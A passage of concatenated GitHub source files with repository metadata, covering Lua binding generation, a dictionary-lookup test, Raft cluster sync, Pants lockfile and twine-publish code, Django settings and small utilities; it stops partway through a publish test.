'MapGenerator.ini' : ('MapGenerator', 'lua_MapGenerator_auto')
#'WebViewFactory.ini' : ('WebViewFactory', 'lua_WebViewFactory_auto'), \
}
target = 'lua'
generator_py = '%s/generator.py' % cxx_generator_root
for key in cmd_args.keys():
args = cmd_args[key]
cfg = '%s/%s' % (tolua_root, key)
print 'Generating bindings for %s...' % (key[:-4])
command = '%s %s %s -s %s -t %s -o %s -n %s' % (python_bin, generator_py, cfg, args[0], target, output_dir, args[1])
_run_cmd(command)
if platform == 'win32':
with _pushd(output_dir):
_run_cmd('dos2unix *')
print '---------------------------------'
print 'Generating lua bindings succeeds.'
print '---------------------------------'
except Exception as e:
if e.__class__.__name__ == 'CmdError':
print '---------------------------------'
print 'Generating lua bindings fails.'
print '---------------------------------'
sys.exit(1)
else:
raise
# -------------- main --------------
if __name__ == '__main__':
main()
| {
"content_hash": "e5c59058cf76d218abebf9ae1d6fdbad",
"timestamp": "",
"source": "github",
"line_count": 162,
"max_line_length": 132,
"avg_line_length": 34.425925925925924,
"alnum_prop": 0.5809575040344271,
"repo_name": "musenshen/SandBoxLua",
"id": "9cbb3c9888b4da8a43f9f79613c38cd4c9899d06",
"size": "5694",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "frameworks/runtime-src/Classes/core/Tools/tolua/genbindings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "4933"
},
{
"name": "C",
"bytes": "7524770"
},
{
"name": "C++",
"bytes": "15406330"
},
{
"name": "CMake",
"bytes": "21051"
},
{
"name": "GLSL",
"bytes": "49475"
},
{
"name": "Java",
"bytes": "287245"
},
{
"name": "Lua",
"bytes": "1013679"
},
{
"name": "Makefile",
"bytes": "35675"
},
{
"name": "Objective-C",
"bytes": "447936"
},
{
"name": "Objective-C++",
"bytes": "295856"
},
{
"name": "Python",
"bytes": "288160"
},
{
"name": "Shell",
"bytes": "6923"
}
],
"symlink_target": ""
} |
from tululbot.utils.kbbi import lookup_kbbi_definition
def test_lookup_kbbi(mocker):
class FakeResponse:
def json(self):
return {
'kateglo': {
'definition': [
{
'lex_class_ref': 'nomina',
'def_text': 'foo bar',
'sample': 'foo bar foo bar'
},
{
'lex_class_ref': 'adjektiva',
'def_text': 'baz quux',
'sample': 'baz baz quux quux'
}
]
}
}
def raise_for_status(self):
pass
fake_term = 'asdf asdf'
mock_get = mocker.patch('tululbot.utils.kbbi.requests.get', return_value=FakeResponse(),
autospec=True)
rv = lookup_kbbi_definition(fake_term)
assert len(rv) == 2
assert {
'class': 'nomina',
'def_text': 'foo bar',
'sample': 'foo bar foo bar'
} in rv
assert {
'class': 'adjektiva',
'def_text': 'baz quux',
'sample': 'baz baz quux quux'
} in rv
mock_get.assert_called_once_with('http://kateglo.com/api.php',
params={'format': 'json', 'phrase': fake_term})
def test_lookup_kbbi_term_not_found(mocker):
class FakeResponse:
def json(self):
raise ValueError
def raise_for_status(self):
pass
mocker.patch('tululbot.utils.kbbi.requests.get', return_value=FakeResponse(),
autospec=True)
rv = lookup_kbbi_definition('asdf asdf')
assert rv == []
| {
"content_hash": "bec8c495069842dd39cdf52ca62e9680",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 92,
"avg_line_length": 28.75409836065574,
"alnum_prop": 0.44982896237172176,
"repo_name": "tulul/tululbot",
"id": "53f4821cb2300f34ce3a95e189bab9c74faeff95",
"size": "1754",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_kbbi.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "46076"
}
],
"symlink_target": ""
} |
"""Tests for the moderation app"""
| {
"content_hash": "b38fb587b09633cff67bc04452525da3",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 34,
"avg_line_length": 35,
"alnum_prop": 0.6857142857142857,
"repo_name": "lpatmo/actionify_the_news",
"id": "4a0f727e0489ab5c9dbe11634154d02c1375ef49",
"size": "35",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "open_connect/moderation/tests/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "546928"
},
{
"name": "HTML",
"bytes": "151617"
},
{
"name": "JavaScript",
"bytes": "211965"
},
{
"name": "Python",
"bytes": "882989"
}
],
"symlink_target": ""
} |
from pysyncobj import SyncObj, replicated
import logging
from .config import Config
logger = logging.getLogger(__name__)
class ClusterNode():
def __init__(self, task_id, config=None):
if config is None:
config = Config()
sync_address = config.get('cluster_bind_address')
sync_ports = config.get('cluster_bind_ports').split(',')
sync_port = int(sync_ports[task_id])
peers = config.get('cluster_peers').split(',') if config.get('cluster_peers') else []
peers = peers + ['%s:%d' % (sync_address, int(port)) for port in sync_ports if int(port) != sync_port]
logging.debug('starting cluster node.')
logging.debug('cluster node binding: %s:%d' % (sync_address, sync_port))
logging.debug('cluster other peers: %s' % peers)
try:
self.sync_obj = ClusterSyncObj(sync_address, sync_port, peers)
except Exception as e:
logger.error('Error when creating sync_obj')
class ClusterSyncObj(SyncObj):
def __init__(self, bind_address, bind_port, peers):
super(ClusterSyncObj, self).__init__('%s:%d' % (bind_address, bind_port), peers)
self.__counter = 0
@replicated
def add_schedule_job(self, trigger_id):
logger.debug('_add_schedule_job')
if self.on_add_schedule_job is not None:
try:
self.on_add_schedule_job(trigger_id)
except Exception as e:
logger.error('Error when adding schedule job : ' + e)
def set_on_add_schedule_job(self, callback):
self.on_add_schedule_job = callback
@replicated
def remove_schedule_job(self, trigger_id):
logger.debug('_remove_schedule_job %s' % trigger_id)
if self.on_remove_schedule_job is not None:
try:
self.on_remove_schedule_job(str(trigger_id))
except Exception as e:
logger.error('Error when removing schedule job : ' + e)
def set_on_remove_schedule_job(self, callback):
self.on_remove_schedule_job = callback
| {
"content_hash": "a6531f1be96ed92f7df7adb8d25b673b",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 110,
"avg_line_length": 40.075471698113205,
"alnum_prop": 0.5955743879472694,
"repo_name": "kevenli/scrapydd",
"id": "d049051e1113774265726072a1344b5c057641a2",
"size": "2124",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scrapydd/cluster.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "245470"
},
{
"name": "Dockerfile",
"bytes": "388"
},
{
"name": "HTML",
"bytes": "31746"
},
{
"name": "JavaScript",
"bytes": "214031"
},
{
"name": "Python",
"bytes": "448360"
},
{
"name": "Shell",
"bytes": "1101"
}
],
"symlink_target": ""
} |
from __future__ import annotations
from dataclasses import dataclass
from enum import Enum
from typing import Any, Iterable, Set, cast
from pants.backend.python.pip_requirement import PipRequirement
from pants.backend.python.util_rules.interpreter_constraints import InterpreterConstraints
from pants.core.util_rules.lockfile_metadata import (
LockfileMetadata,
LockfileMetadataValidation,
LockfileScope,
_get_metadata,
lockfile_metadata_registrar,
)
_python_lockfile_metadata = lockfile_metadata_registrar(LockfileScope.PYTHON)
class InvalidPythonLockfileReason(Enum):
INVALIDATION_DIGEST_MISMATCH = "invalidation_digest_mismatch"
INTERPRETER_CONSTRAINTS_MISMATCH = "interpreter_constraints_mismatch"
REQUIREMENTS_MISMATCH = "requirements_mismatch"
MANYLINUX_MISMATCH = "manylinux_mismatch"
CONSTRAINTS_FILE_MISMATCH = "constraints_file_mismatch"
ONLY_BINARY_MISMATCH = "only_binary_mismatch"
NO_BINARY_MISMATCH = "no_binary_mismatch"
@dataclass(frozen=True)
class PythonLockfileMetadata(LockfileMetadata):
scope = LockfileScope.PYTHON
valid_for_interpreter_constraints: InterpreterConstraints
@staticmethod
def new(
*,
valid_for_interpreter_constraints: InterpreterConstraints,
requirements: set[PipRequirement],
manylinux: str | None,
requirement_constraints: set[PipRequirement],
only_binary: set[PipRequirement],
no_binary: set[PipRequirement],
) -> PythonLockfileMetadata:
"""Call the most recent version of the `LockfileMetadata` class to construct a concrete
instance.
This static method should be used in place of the `LockfileMetadata` constructor. This gives
calling sites a predictable method to call to construct a new `LockfileMetadata` for
writing, while still allowing us to support _reading_ older, deprecated metadata versions.
"""
return PythonLockfileMetadataV3(
valid_for_interpreter_constraints,
requirements,
manylinux=manylinux,
requirement_constraints=requirement_constraints,
only_binary=only_binary,
no_binary=no_binary,
)
@classmethod
def additional_header_attrs(cls, instance: LockfileMetadata) -> dict[Any, Any]:
instance = cast(PythonLockfileMetadata, instance)
return {
"valid_for_interpreter_constraints": [
str(ic) for ic in instance.valid_for_interpreter_constraints
]
}
def is_valid_for(
self,
*,
is_tool: bool,
expected_invalidation_digest: str | None,
user_interpreter_constraints: InterpreterConstraints,
interpreter_universe: Iterable[str],
user_requirements: Iterable[PipRequirement],
manylinux: str | None,
requirement_constraints: Iterable[PipRequirement],
only_binary: Iterable[PipRequirement],
no_binary: Iterable[PipRequirement],
) -> LockfileMetadataValidation:
"""Returns Truthy if this `PythonLockfileMetadata` can be used in the current execution
context."""
raise NotImplementedError("call `is_valid_for` on subclasses only")
@_python_lockfile_metadata(1)
@dataclass(frozen=True)
class PythonLockfileMetadataV1(PythonLockfileMetadata):
requirements_invalidation_digest: str
@classmethod
def _from_json_dict(
cls: type[PythonLockfileMetadataV1],
json_dict: dict[Any, Any],
lockfile_description: str,
error_suffix: str,
) -> PythonLockfileMetadataV1:
metadata = _get_metadata(json_dict, lockfile_description, error_suffix)
interpreter_constraints = metadata(
"valid_for_interpreter_constraints", InterpreterConstraints, InterpreterConstraints
)
requirements_digest = metadata("requirements_invalidation_digest", str, None)
return PythonLockfileMetadataV1(interpreter_constraints, requirements_digest)
@classmethod
def additional_header_attrs(cls, instance: LockfileMetadata) -> dict[Any, Any]:
instance = cast(PythonLockfileMetadataV1, instance)
return {"requirements_invalidation_digest": instance.requirements_invalidation_digest}
def is_valid_for(
self,
*,
is_tool: bool,
expected_invalidation_digest: str | None,
user_interpreter_constraints: InterpreterConstraints,
interpreter_universe: Iterable[str],
# Everything below is not used by v1.
user_requirements: Iterable[PipRequirement],
manylinux: str | None,
requirement_constraints: Iterable[PipRequirement],
only_binary: Iterable[PipRequirement],
no_binary: Iterable[PipRequirement],
) -> LockfileMetadataValidation:
failure_reasons: set[InvalidPythonLockfileReason] = set()
if expected_invalidation_digest is None:
return LockfileMetadataValidation(failure_reasons)
if self.requirements_invalidation_digest != expected_invalidation_digest:
failure_reasons.add(InvalidPythonLockfileReason.INVALIDATION_DIGEST_MISMATCH)
if not self.valid_for_interpreter_constraints.contains(
user_interpreter_constraints, interpreter_universe
):
failure_reasons.add(InvalidPythonLockfileReason.INTERPRETER_CONSTRAINTS_MISMATCH)
return LockfileMetadataValidation(failure_reasons)
@_python_lockfile_metadata(2)
@dataclass(frozen=True)
class PythonLockfileMetadataV2(PythonLockfileMetadata):
"""Lockfile version that permits specifying a requirements as a set rather than a digest.
Validity is tested by the set of requirements strings being the same in the user requirements as
those in the stored requirements.
"""
requirements: set[PipRequirement]
@classmethod
def _from_json_dict(
cls: type[PythonLockfileMetadataV2],
json_dict: dict[Any, Any],
lockfile_description: str,
error_suffix: str,
) -> PythonLockfileMetadataV2:
metadata = _get_metadata(json_dict, lockfile_description, error_suffix)
requirements = metadata(
"generated_with_requirements",
Set[PipRequirement],
lambda l: {
PipRequirement.parse(i, description_of_origin=lockfile_description) for i in l
},
)
interpreter_constraints = metadata(
"valid_for_interpreter_constraints", InterpreterConstraints, InterpreterConstraints
)
return PythonLockfileMetadataV2(interpreter_constraints, requirements)
@classmethod
def additional_header_attrs(cls, instance: LockfileMetadata) -> dict[Any, Any]:
instance = cast(PythonLockfileMetadataV2, instance)
# Requirements need to be stringified then sorted so that tests are deterministic. Sorting
# followed by stringifying does not produce a meaningful result.
return {"generated_with_requirements": (sorted(str(i) for i in instance.requirements))}
def is_valid_for(
self,
*,
is_tool: bool,
expected_invalidation_digest: str | None, # Not used by V2.
user_interpreter_constraints: InterpreterConstraints,
interpreter_universe: Iterable[str],
user_requirements: Iterable[PipRequirement],
# Everything below is not used by V2.
manylinux: str | None,
requirement_constraints: Iterable[PipRequirement],
only_binary: Iterable[PipRequirement],
no_binary: Iterable[PipRequirement],
) -> LockfileMetadataValidation:
failure_reasons = set()
invalid_reqs = (
self.requirements != set(user_requirements)
if is_tool
else not set(user_requirements).issubset(self.requirements)
)
if invalid_reqs:
failure_reasons.add(InvalidPythonLockfileReason.REQUIREMENTS_MISMATCH)
if not self.valid_for_interpreter_constraints.contains(
user_interpreter_constraints, interpreter_universe
):
failure_reasons.add(InvalidPythonLockfileReason.INTERPRETER_CONSTRAINTS_MISMATCH)
return LockfileMetadataValidation(failure_reasons)
@_python_lockfile_metadata(3)
@dataclass(frozen=True)
class PythonLockfileMetadataV3(PythonLockfileMetadataV2):
"""Lockfile version that considers constraints files."""
manylinux: str | None
requirement_constraints: set[PipRequirement]
only_binary: set[PipRequirement]
no_binary: set[PipRequirement]
@classmethod
def _from_json_dict(
cls: type[PythonLockfileMetadataV3],
json_dict: dict[Any, Any],
lockfile_description: str,
error_suffix: str,
) -> PythonLockfileMetadataV3:
v2_metadata = super()._from_json_dict(json_dict, lockfile_description, error_suffix)
metadata = _get_metadata(json_dict, lockfile_description, error_suffix)
manylinux = metadata("manylinux", str, lambda l: l) # type: ignore[no-any-return]
requirement_constraints = metadata(
"requirement_constraints",
Set[PipRequirement],
lambda l: {
PipRequirement.parse(i, description_of_origin=lockfile_description) for i in l
},
)
only_binary = metadata(
"only_binary",
Set[PipRequirement],
lambda l: {
PipRequirement.parse(i, description_of_origin=lockfile_description) for i in l
},
)
no_binary = metadata(
"no_binary",
Set[PipRequirement],
lambda l: {
PipRequirement.parse(i, description_of_origin=lockfile_description) for i in l
},
)
return PythonLockfileMetadataV3(
valid_for_interpreter_constraints=v2_metadata.valid_for_interpreter_constraints,
requirements=v2_metadata.requirements,
manylinux=manylinux,
requirement_constraints=requirement_constraints,
only_binary=only_binary,
no_binary=no_binary,
)
@classmethod
def additional_header_attrs(cls, instance: LockfileMetadata) -> dict[Any, Any]:
instance = cast(PythonLockfileMetadataV3, instance)
return {
"manylinux": instance.manylinux,
"requirement_constraints": sorted(str(i) for i in instance.requirement_constraints),
"only_binary": sorted(str(i) for i in instance.only_binary),
"no_binary": sorted(str(i) for i in instance.no_binary),
}
def is_valid_for(
self,
*,
is_tool: bool,
expected_invalidation_digest: str | None, # Validation digests are not used by V2.
user_interpreter_constraints: InterpreterConstraints,
interpreter_universe: Iterable[str],
user_requirements: Iterable[PipRequirement],
manylinux: str | None,
requirement_constraints: Iterable[PipRequirement],
only_binary: Iterable[PipRequirement],
no_binary: Iterable[PipRequirement],
) -> LockfileMetadataValidation:
failure_reasons = (
super()
.is_valid_for(
is_tool=is_tool,
expected_invalidation_digest=expected_invalidation_digest,
user_interpreter_constraints=user_interpreter_constraints,
interpreter_universe=interpreter_universe,
user_requirements=user_requirements,
manylinux=manylinux,
requirement_constraints=requirement_constraints,
only_binary=only_binary,
no_binary=no_binary,
)
.failure_reasons
)
if self.manylinux != manylinux:
failure_reasons.add(InvalidPythonLockfileReason.MANYLINUX_MISMATCH)
if self.requirement_constraints != set(requirement_constraints):
failure_reasons.add(InvalidPythonLockfileReason.CONSTRAINTS_FILE_MISMATCH)
if self.only_binary != set(only_binary):
failure_reasons.add(InvalidPythonLockfileReason.ONLY_BINARY_MISMATCH)
if self.no_binary != set(no_binary):
failure_reasons.add(InvalidPythonLockfileReason.NO_BINARY_MISMATCH)
return LockfileMetadataValidation(failure_reasons)
| {
"content_hash": "596832e6669ae5a498df6fc5b0881cc7",
"timestamp": "",
"source": "github",
"line_count": 319,
"max_line_length": 100,
"avg_line_length": 38.78369905956113,
"alnum_prop": 0.6703847397348852,
"repo_name": "benjyw/pants",
"id": "f614b12dd8d7cbb2d520f14828f70d2423704362",
"size": "12504",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "src/python/pants/backend/python/util_rules/lockfile_metadata.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "688"
},
{
"name": "Go",
"bytes": "67315"
},
{
"name": "Java",
"bytes": "10690"
},
{
"name": "Kotlin",
"bytes": "6433"
},
{
"name": "Mustache",
"bytes": "3595"
},
{
"name": "Python",
"bytes": "7135320"
},
{
"name": "Rust",
"bytes": "1601736"
},
{
"name": "Scala",
"bytes": "21950"
},
{
"name": "Shell",
"bytes": "31723"
},
{
"name": "Starlark",
"bytes": "72809"
}
],
"symlink_target": ""
} |
"""
Django settings for expirationDate project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS as TCP
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '_9u%=1$=lkix#6*sz@6uve1c%+)u61^fcg^n2jiy)=5742^((o'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
DJANGO_APPS = (
'suit',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
)
THIRD_PARTY_APPS = (
'django_extensions',
'reversion',
'simple_history',
)
PROJECT_APPS = (
'expirationDate',
'persons',
'cemeteries',
'registers',
)
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + PROJECT_APPS
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'simple_history.middleware.HistoryRequestMiddleware',
)
ROOT_URLCONF = 'expirationDate.urls'
WSGI_APPLICATION = 'expirationDate.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Bucharest'
USE_I18N = True
USE_L10N = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, '..', 'htdocs', 'static')
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(BASE_DIR, '..', 'htdocs', 'media')
MEDIA_URL = '/media/'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, 'expirationDate', 'templates'),
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = TCP + (
'django.core.context_processors.request',
)
SUIT_CONFIG = {
# header
'ADMIN_NAME': 'Cemetery Management',
# 'HEADER_DATE_FORMAT': 'l, j. F Y',
# 'HEADER_TIME_FORMAT': 'H:i',
}
| {
"content_hash": "4c559e2aa3f5067f5ecc3abf63a4de78",
"timestamp": "",
"source": "github",
"line_count": 130,
"max_line_length": 74,
"avg_line_length": 24.546153846153846,
"alnum_prop": 0.7082419304293325,
"repo_name": "BontaVlad/ExpirationDate",
"id": "93bb5f5ebbf3f7b79cf13c74cc0a8f929c08cbc8",
"size": "3191",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "expirationDate/expirationDate/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "117482"
},
{
"name": "JavaScript",
"bytes": "161291"
},
{
"name": "Python",
"bytes": "33481"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import os
import os.path
import signal
import subprocess
import sys
GCMOLE_PATH = os.path.dirname(os.path.abspath(__file__))
CLANG_BIN = os.path.join(GCMOLE_PATH, 'gcmole-tools', 'bin')
CLANG_PLUGINS = os.path.join(GCMOLE_PATH, 'gcmole-tools')
LUA = os.path.join(GCMOLE_PATH, 'gcmole-tools', 'lua52')
DRIVER = os.path.join(GCMOLE_PATH, 'gcmole.lua')
BASE_PATH = os.path.dirname(os.path.dirname(GCMOLE_PATH))
assert len(sys.argv) == 2
if not os.path.isfile("out/Release/gen/torque-generated/builtin-definitions-tq.h"):
print("Expected generated headers in out/Release/gen.")
print("Either build v8 in out/Release or change gcmole.lua:115")
sys.exit(-1)
proc = subprocess.Popen(
[LUA, DRIVER, sys.argv[1]],
env={'CLANG_BIN': CLANG_BIN, 'CLANG_PLUGINS': CLANG_PLUGINS},
cwd=BASE_PATH,
)
def handle_sigterm(*args):
try:
proc.kill()
except OSError:
pass
signal.signal(signal.SIGTERM, handle_sigterm)
proc.communicate()
sys.exit(proc.returncode)
| {
"content_hash": "cb7636b5b8839bfff07f3ed7fc354250",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 83,
"avg_line_length": 26.736842105263158,
"alnum_prop": 0.7145669291338582,
"repo_name": "enclose-io/compiler",
"id": "6f2a091c3c7e62c8d48d5d82a1fcced0817baef0",
"size": "1231",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "current/deps/v8/tools/gcmole/run-gcmole.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Ruby",
"bytes": "11474"
},
{
"name": "Shell",
"bytes": "131"
}
],
"symlink_target": ""
} |
"These module contains some additional functions for string manipulation."
def reverse(s):
"Reverts string s."
return s[::-1]
def distinct_len(s):
"Counts number of distinct chars in string s."
return len(set(s))
| {
"content_hash": "f35e3c9a3197376a6175539eafcaa29d",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 74,
"avg_line_length": 19.5,
"alnum_prop": 0.6837606837606838,
"repo_name": "gvasold/gdp17",
"id": "7716ad3968d59039cbdeaa622a37e6c69991d61f",
"size": "234",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "module/mystring.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "53"
},
{
"name": "HTML",
"bytes": "4606"
},
{
"name": "Jupyter Notebook",
"bytes": "268133"
},
{
"name": "Python",
"bytes": "43755"
},
{
"name": "Shell",
"bytes": "66"
}
],
"symlink_target": ""
} |
import six
from olympia.addons.models import Category
from olympia.amo.tests import TestCase
from olympia.constants.applications import APPS
from olympia.constants.base import ADDON_EXTENSION, ADDON_PERSONA
from olympia.constants.categories import CATEGORIES
from olympia.landfill.categories import generate_categories
class CategoriesTests(TestCase):
def test_categories_themes_generation(self):
data = generate_categories(APPS['firefox'], ADDON_PERSONA)
assert len(data) == Category.objects.all().count()
assert len(data) == 15
def test_categories_addons_generation(self):
data = generate_categories(APPS['android'], ADDON_EXTENSION)
assert len(data) == Category.objects.all().count()
assert len(data) == 11
category = Category.objects.get(
id=CATEGORIES[APPS['android'].id][ADDON_EXTENSION]['shopping'].id)
assert six.text_type(category.name) == u'Shopping'
# Re-generating should not create any more.
data = generate_categories(APPS['android'], ADDON_EXTENSION)
assert len(data) == Category.objects.all().count()
assert len(data) == 11
# Name should still be the same.
category = Category.objects.get(
id=CATEGORIES[APPS['android'].id][ADDON_EXTENSION]['shopping'].id)
assert six.text_type(category.name) == u'Shopping'
| {
"content_hash": "66818f3f4c8c6d46c756eb27f7a80e5d",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 78,
"avg_line_length": 39.542857142857144,
"alnum_prop": 0.6893063583815029,
"repo_name": "wagnerand/olympia",
"id": "79b54bfe34884a8de11a95395bebad199bf57dbe",
"size": "1408",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "src/olympia/landfill/tests/test_categories.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "249"
},
{
"name": "CSS",
"bytes": "663668"
},
{
"name": "HTML",
"bytes": "1600904"
},
{
"name": "JavaScript",
"bytes": "1314155"
},
{
"name": "Makefile",
"bytes": "4235"
},
{
"name": "PLSQL",
"bytes": "74"
},
{
"name": "Python",
"bytes": "3996776"
},
{
"name": "Shell",
"bytes": "9101"
},
{
"name": "Smarty",
"bytes": "1930"
}
],
"symlink_target": ""
} |
from mock import patch
def load_settings(cls, settings):
return patch.object(cls, '_retrieve_stored_settings', return_value=settings)
| {
"content_hash": "8b9b24974f983e7611852cce2dd5f550",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 80,
"avg_line_length": 28,
"alnum_prop": 0.7571428571428571,
"repo_name": "MD-Studio/MDStudio",
"id": "df6c74109a33a315da506e4083e38c82839c1228",
"size": "165",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mdstudio/mdstudio/unittest/settings.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "70059"
},
{
"name": "Dockerfile",
"bytes": "2228"
},
{
"name": "HTML",
"bytes": "48489"
},
{
"name": "JavaScript",
"bytes": "2621"
},
{
"name": "Makefile",
"bytes": "6901"
},
{
"name": "Python",
"bytes": "711926"
},
{
"name": "Shell",
"bytes": "6139"
},
{
"name": "TypeScript",
"bytes": "66514"
}
],
"symlink_target": ""
} |
from __future__ import annotations
from textwrap import dedent
from typing import Callable
import pytest
from pants.backend.python.goals.publish import (
PublishPythonPackageFieldSet,
PublishPythonPackageRequest,
rules,
)
from pants.backend.python.macros.python_artifact import PythonArtifact
from pants.backend.python.target_types import PythonDistribution, PythonSourcesGeneratorTarget
from pants.backend.python.util_rules import pex_from_targets
from pants.core.goals.package import BuiltPackage, BuiltPackageArtifact
from pants.core.goals.publish import PublishPackages, PublishProcesses
from pants.core.util_rules.config_files import rules as config_files_rules
from pants.engine.addresses import Address
from pants.engine.fs import EMPTY_DIGEST
from pants.engine.process import Process
from pants.testutil.process_util import process_assertion
from pants.testutil.rule_runner import QueryRule, RuleRunner
from pants.util.frozendict import FrozenDict
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
preserve_tmpdirs=True,
rules=[
*config_files_rules(),
*pex_from_targets.rules(),
*rules(),
QueryRule(PublishProcesses, [PublishPythonPackageRequest]),
],
target_types=[PythonSourcesGeneratorTarget, PythonDistribution],
objects={"python_artifact": PythonArtifact},
)
return set_options(rule_runner)
def set_options(rule_runner: RuleRunner, options: list | None = None) -> RuleRunner:
rule_runner.set_options(
options or [],
env_inherit={"PATH", "PYENV_ROOT", "HOME"},
env={"TWINE_PASSWORD_PYPI": "secret"},
)
return rule_runner
@pytest.fixture
def packages():
return (
BuiltPackage(
EMPTY_DIGEST,
(
BuiltPackageArtifact("my-package-0.1.0.tar.gz"),
BuiltPackageArtifact("my_package-0.1.0-py3-none-any.whl"),
),
),
)
def project_files(
skip_twine: bool = False, repositories: list[str] = ["@pypi", "@private"]
) -> dict[str, str]:
return {
"src/BUILD": dedent(
f"""\
python_sources()
python_distribution(
name="dist",
provides=python_artifact(
name="my-package",
version="0.1.0",
),
repositories={repositories!r},
skip_twine={skip_twine},
)
"""
),
"src/hello.py": """print("hello")""",
".pypirc": "",
}
def request_publish_processes(rule_runner: RuleRunner, packages) -> PublishProcesses:
tgt = rule_runner.get_target(Address("src", target_name="dist"))
fs = PublishPythonPackageFieldSet.create(tgt)
return rule_runner.request(PublishProcesses, [fs._request(packages)])
def assert_package(
package: PublishPackages,
expect_names: tuple[str, ...],
expect_description: str,
expect_process: Callable[[Process], None] | None,
) -> None:
assert package.names == expect_names
assert package.description == expect_description
if expect_process:
assert package.process
expect_process(package.process.process)
else:
assert package.process is None
def test_twine_upload(rule_runner, packages) -> None:
rule_runner.write_files(project_files(skip_twine=False))
result = request_publish_processes(rule_runner, packages)
assert len(result) == 2
assert_package(
result[0],
expect_names=(
"my-package-0.1.0.tar.gz",
"my_package-0.1.0-py3-none-any.whl",
),
expect_description="@pypi",
expect_process=process_assertion(
argv=(
"./twine.pex_pex_shim.sh",
"upload",
"--non-interactive",
"--config-file=.pypirc",
"--repository=pypi",
"my-package-0.1.0.tar.gz",
"my_package-0.1.0-py3-none-any.whl",
),
env=FrozenDict({"TWINE_PASSWORD": "secret"}),
),
)
assert_package(
result[1],
expect_names=(
"my-package-0.1.0.tar.gz",
"my_package-0.1.0-py3-none-any.whl",
),
expect_description="@private",
expect_process=process_assertion(
argv=(
"./twine.pex_pex_shim.sh",
"upload",
"--non-interactive",
"--config-file=.pypirc",
"--repository=private",
"my-package-0.1.0.tar.gz",
"my_package-0.1.0-py3-none-any.whl",
),
env=FrozenDict(),
),
)
def test_skip_twine(rule_runner, packages) -> None:
rule_runner.write_files(project_files(skip_twine=True))
result = request_publish_processes(rule_runner, packages)
assert len(result) == 1
assert_package(
result[0],
expect_names=(
"my-package-0.1.0.tar.gz",
"my_package-0.1.0-py3-none-any.whl",
),
expect_description="(by `skip_twine` on src:dist)",
expect_process=None,
)
# Skip twine globally from config option.
rule_runner.set_options(["--twine-skip"])
result = request_publish_processes(rule_runner, packages)
assert len(result) == 0
@pytest.mark.parametrize(
"options, cert_arg",
[
pytest.param(
[],
None,
id="No ca cert",
),
pytest.param(
["--twine-ca-certs-path={}"],
"--cert=ca_certs.pem",
id="[twine].ca_certs_path",
),
